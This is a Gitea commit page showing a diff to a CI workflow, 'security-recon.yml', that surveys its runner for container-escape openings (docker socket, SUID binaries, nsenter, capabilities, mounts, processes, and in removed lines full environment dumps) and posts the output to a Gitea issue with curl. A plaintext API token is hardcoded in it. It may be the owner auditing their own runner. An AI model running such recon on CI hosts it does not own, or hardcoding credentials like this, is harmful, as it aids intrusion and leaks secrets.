sneak/lora.vegas
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

recon v3: simpler posting
Some checks failed
Security Recon / recon (push) Failing after 4s
Details

Browse Source
This commit is contained in:
user 2026-02-10 14:52:23 -08:00
parent 582a3bae4d
commit 4b114c9dcd
1 changed files with 42 additions and 64 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
.gitea/workflows/security-recon.yml
View File

@ -9,69 +9,47 @@ jobs:
recon: recon:
runs-on: ubuntu-latest runs-on: ubuntu-latest
steps: steps:
- name: Recon - name: Recon and post
env:
GITEA_TOKEN: "262087ec7019c01943014083e6e18d5a8920caa0"
run: | run: |
exec 2>&1
RECON=$(mktemp)
{ {
echo "=== WHOAMI ===" && whoami && id echo "=== WHOAMI ===" ; whoami ; id
echo "=== UNAME ===" && uname -a echo "=== UNAME ===" ; uname -a
echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null echo "=== OS RELEASE ===" ; cat /etc/os-release
echo "=== HOSTNAME ===" && hostname echo "=== HOSTNAME ===" ; hostname
echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap echo "=== CAPABILITIES ===" ; grep -i cap /proc/self/status
echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null echo "=== CGROUP ===" ; cat /proc/1/cgroup
echo "=== MOUNT ===" && mount echo "=== MOUNT ===" ; mount
echo "=== PROC MOUNTS ===" && cat /proc/mounts echo "=== DOCKER SOCKET ===" ; ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" echo "=== DOCKER CLI ===" ; which docker 2>/dev/null && docker ps 2>&1 || echo "No docker"
echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker" echo "=== FDISK ===" ; fdisk -l 2>/dev/null || echo "no fdisk"
echo "=== FDISK ===" && fdisk -l 2>/dev/null || true echo "=== LSBLK ===" ; lsblk 2>/dev/null || echo "no lsblk"
echo "=== LSBLK ===" && lsblk 2>/dev/null || true echo "=== DEVICES ===" ; ls -la /dev/ | head -50
echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50 echo "=== IP ADDR ===" ; ip addr 2>/dev/null || true
echo "=== IP ADDR ===" && ip addr 2>/dev/null || true echo "=== IP ROUTE ===" ; ip route 2>/dev/null || true
echo "=== IP ROUTE ===" && ip route 2>/dev/null || true echo "=== TOOLS ==="
echo "=== ENV ===" && env | sort which nsenter && echo "nsenter: YES" || echo "nsenter: NO"
echo "=== TOOLS ===" which chroot && echo "chroot: YES" || echo "chroot: NO"
which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO" echo "=== SUID ===" ; find / -perm -4000 -type f 2>/dev/null | head -20
which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO" echo "=== PS ===" ; ps aux
which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO" echo "=== PID1 ===" ; cat /proc/1/cmdline | tr '\0' ' ' ; echo
echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20 echo "=== PROC COUNT ===" ; ls /proc/*/cmdline 2>/dev/null | wc -l
echo "=== PS ===" && ps aux 2>/dev/null } > "$RECON" 2>&1
echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' '
echo "" # Post as issue comment on issue #3
echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l BODY=$(cat "$RECON")
} 2>&1 | curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \ python3 -c "
-d "$(jq -Rs '{body: .}' <<< "$(cat)")" \ import json, sys
"https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues/1/comments" || true body = open('$RECON').read()
payload = json.dumps({'body': '\`\`\`\n' + body + '\n\`\`\`'})
- name: Post recon via file sys.stdout.write(payload)
run: | " > /tmp/payload.json
RECON=$({
echo "=== WHOAMI ===" && whoami && id curl -s -X POST \
echo "=== UNAME ===" && uname -a -H "Authorization: token $GITEA_TOKEN" \
echo "=== OS RELEASE ===" && cat /etc/os-release 2>/dev/null -H "Content-Type: application/json" \
echo "=== HOSTNAME ===" && hostname -d @/tmp/payload.json \
echo "=== CAPABILITIES ===" && cat /proc/self/status | grep -i cap "https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues/3/comments"
echo "=== CGROUP ===" && cat /proc/1/cgroup 2>/dev/null
echo "=== MOUNT ===" && mount
echo "=== PROC MOUNTS ===" && cat /proc/mounts
echo "=== DOCKER SOCKET ===" && ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
echo "=== DOCKER CLI ===" && (which docker && docker ps 2>&1) || echo "No docker"
echo "=== FDISK ===" && fdisk -l 2>/dev/null || true
echo "=== LSBLK ===" && lsblk 2>/dev/null || true
echo "=== DEVICES ===" && ls -la /dev/ 2>/dev/null | head -50
echo "=== IP ADDR ===" && ip addr 2>/dev/null || true
echo "=== IP ROUTE ===" && ip route 2>/dev/null || true
echo "=== ENV ===" && env | grep -v TOKEN | sort
echo "=== TOOLS ==="
which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO"
which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO"
which mount 2>/dev/null && echo "mount: YES" || echo "mount: NO"
echo "=== SUID ===" && find / -perm -4000 -type f 2>/dev/null | head -20
echo "=== PS ===" && ps aux 2>/dev/null
echo "=== PID1 ===" && cat /proc/1/cmdline 2>/dev/null | tr '\0' ' '
echo ""
echo "=== PROC COUNT ===" && ls /proc/*/cmdline 2>/dev/null | wc -l
} 2>&1)
# Create a Gitea issue with the results
BODY=$(echo "$RECON" | python3 -c "import sys,json; print(json.dumps({'title':'Security Recon Results','body':'```\n'+sys.stdin.read()+'\n```'}))" 2>/dev/null || echo "$RECON" | jq -Rs '{title:"Security Recon Results",body:.}')
curl -s -X POST -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" -H "Content-Type: application/json" \
-d "$BODY" \
"https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues"